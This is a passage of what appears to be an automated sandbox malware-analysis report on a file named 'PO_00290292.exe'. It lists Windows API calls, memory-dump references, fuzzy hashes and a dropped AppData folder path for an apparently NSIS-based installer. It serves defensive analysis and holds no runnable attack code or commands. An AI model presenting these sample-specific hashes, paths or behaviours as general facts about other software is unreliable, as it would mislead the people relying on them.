                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 1096422788-0
                                                                  • Opcode ID: 2412c5e6e38f405480bfb5068b9d3e64da5a88d06b16ee9e0a03aeafae2b93d0
                                                                  • Instruction ID: 815fd251d1ef055c124add3867079dbd89389a2e6f50d5753089410e689aa70c
                                                                  • Opcode Fuzzy Hash: 2412c5e6e38f405480bfb5068b9d3e64da5a88d06b16ee9e0a03aeafae2b93d0
                                                                  • Instruction Fuzzy Hash: 91E04F30800208BBDF01AFA4CE49DBD3B79AF00344F14043AF940AB0D5E7F89A819749
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 694438e2711fe54d40bb1ff94b0c367670ea04c6faeed320443158d9ce86139f
                                                                  • Instruction ID: b466977811d287c246b6c4bdd3c4099c205cff96c1e3616f4719a22f3098d0f0
                                                                  • Opcode Fuzzy Hash: 694438e2711fe54d40bb1ff94b0c367670ea04c6faeed320443158d9ce86139f
                                                                  • Instruction Fuzzy Hash: 4ED05B33704100D7CB10DFE89E0869D7775AB40334B208177D501F21E4D6B9C5515B1D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040428E Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                                  • Instruction ID: 8584b4a80e8197aea4c9dd325401cbfcfbe68695eba590e205f4256e4e85e437
                                                                  • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                                  • Instruction Fuzzy Hash: 67C04C71740600BBDA20CB649D45F1677546754740F1448697640A60E0C674D420D62C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                  • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                  • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                  • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404277 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                  • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                                  • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                  • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404264 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040403C), ref: 0040426E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                                  • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
                                                                  • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                                  • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 613bb76dd51035f8e992bd3810ec25ac52a321cc6884ad386f64fc6a650c1bcc
                                                                  • Instruction ID: 98ea867d558ea3f6c4ea23e9af3ccb97d5497e9459daf2a95be3f4ba7839a378
                                                                  • Opcode Fuzzy Hash: 613bb76dd51035f8e992bd3810ec25ac52a321cc6884ad386f64fc6a650c1bcc
                                                                  • Instruction Fuzzy Hash: E7D01277B14100DBD760EFB9BF89C6F73A9EB513293214837D902E11A2D57DC812462D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 00404C59 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C71
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C7C
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CD9
                                                                  • SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
                                                                  • DeleteObject.GDI32(00000000), ref: 00404D4F
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EA9
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405079
                                                                  • GlobalFree.KERNEL32(?), ref: 00405089
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DA
                                                                  • ShowWindow.USER32(?,00000000), ref: 00405228
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405233
                                                                  • ShowWindow.USER32(00000000), ref: 0040523A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                                  • Instruction ID: ce840dee0c3a5b827351c7f25dbf2e3605d0905f5c54158640504e6bfb71dde6
                                                                  • Opcode Fuzzy Hash: 2479b366cad44d8d2a02fbd124e29c277f71441e1411fda8dea8c44bba4244d6
                                                                  • Instruction Fuzzy Hash: 4C023EB0A00209EFDF209F64CD45AAE7BB5FB84355F10817AE610BA2E1C7799D52CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004046DD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040472C
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404756
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404807
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404812
                                                                  • lstrcmpiW.KERNEL32(Remove folder: ,00423728,00000000,?,?), ref: 00404844
                                                                  • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404850
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404862
                                                                    • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
                                                                    • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                                    • Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                                    • Part of subcall function 00406412: CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                                    • Part of subcall function 00406412: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO_00290292.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                                  • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404925
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940
                                                                    • Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                    • Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
                                                                    • Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: (7B$A$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$Remove folder:
                                                                  • API String ID: 2624150263-2451812599
                                                                  • Opcode ID: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                  • Instruction ID: d5aaf60bd55b21875b9c8b9a8d0b3d7e01f34e6f89f3adcbdcc63617e1d21faf
                                                                  • Opcode Fuzzy Hash: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                  • Instruction Fuzzy Hash: B7A191F1A00209ABDB11AFA5CC45AAF77B8EF84354F10847BF601B62D1D77C99418B6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement, xrefs: 00402154
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement
                                                                  • API String ID: 542301482-4198271790
                                                                  • Opcode ID: 3f37e0e1a3b82b76417f5addfce7e9ce955a39bfd9153315acfc7234e1bdb920
                                                                  • Instruction ID: a109dbacb2976faa502b9a92b0b1fafcf02ea9b6fb783d383e2774f19d5eba59
                                                                  • Opcode Fuzzy Hash: 3f37e0e1a3b82b76417f5addfce7e9ce955a39bfd9153315acfc7234e1bdb920
                                                                  • Instruction Fuzzy Hash: FA412C75A00209AFCF00DFA4CD88AAD7BB6FF48314B20457AF515EB2D1DBB99A41CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004043DF Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
